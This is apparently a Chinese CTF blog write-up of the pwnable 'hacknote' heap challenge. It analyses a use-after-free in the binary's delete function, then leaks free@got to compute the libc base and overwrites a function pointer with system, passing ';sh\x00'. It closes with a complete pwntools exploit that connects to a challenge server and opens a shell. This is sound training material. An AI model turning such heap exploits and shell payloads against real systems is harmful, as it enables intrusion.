pwnable_hacknote

pwnable_hacknote

使用checksec查看:
在这里插入图片描述

开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:
在这里插入图片描述

看到菜单,应该是一道堆题了,放进IDA中查看:
在这里插入图片描述

这里我已经将函数重命名了,接下来分步看:

sub_8048956()
在这里插入图片描述

  • 对应menu(),略过

sub_8048646()
在这里插入图片描述

  • ptr[i] = malloc(8u);:程序首先会自动创建一个0x8大小的chunk
  • *(_DWORD *)ptr[i] = puts_0;:puts_0内容是return puts(*(const char **)(a1 + 4));,这个函数作用是puts
  • v0 = ptr[i];:存放puts_0的地址
  • v0[1] = malloc(size);:存放用户创建的chunk的地址
  • 对应add()

sub_80487D4()
在这里插入图片描述

  • free(*((void **)ptr[v1] + 1)); free(ptr[v1]);:先释放用户创建的chunk再释放程序自动创建的chunk,没有清空指针
  • 存在UAF

sub_80488A5()
在这里插入图片描述

  • (*(void (__cdecl **)(void *))ptr[v1])(ptr[v1]);:调用puts_0输出内容

题目思路

  • 存在UFA,利用该漏洞泄露libc
  • puts_0修改为system@got
  • 执行show()就相当于执行system('/bin/sh')

步骤解析

首先创建两个chunk:chunk0、chunk1,大小为0x18,不和程序自动创建的chunk大小相同就行

在这里插入图片描述

接着将两个chunk都free掉,申请0x8大小的一个chunk,这样就能将程序创建的chunk0和chunk1给申请过来,申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

所以这里需要填上puts_0地址,和free@got地址

调用puts_0时就会输出free@got的真实地址

在这里插入图片描述

得到free@got的地址之后就可以计算出system@got的地址。

free掉chunk2在重新申请

同样的申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

此时将puts_0替换为system@got用户创建chunk0的地址替换为;sh\x00即可getshell

在这里插入图片描述

这里使用;sh\x00是因为content的内容是system@got+;sh\x00,首先执行sysstem(system@got)再去执行sysstem(';sh\x00')分号是为了让前面语句结束后执行后面语句

完整exp

from pwn import *

#start 
r = remote("node4.buuoj.cn",25285)
# r = process("../buu/pwnable_hacknote")
elf = ELF("../buu/pwnable_hacknote")
libc = ELF("../buu/ubuntu16(32).so")
context.log_level = 'debug'

def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("size :",str(size))
    r.sendlineafter("Content :",content)

def delete(idx):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))


#params
free_got = elf.got['free']


#attack
add(0x18,'MMMM')
add(0x18,'MMMM')
# gdb.attach(r)
delete(0)
delete(1)

payload = p32(0x804862B) + p32(free_got)
add(0x8,payload)
# gdb.attach(r)

show(0)
free_addr = u32(r.recv(4))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

delete(2)
payload = p32(system_addr) + b';sh\x00'
add(0x8,payload)
# gdb.attach(r)
show(0)

r.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值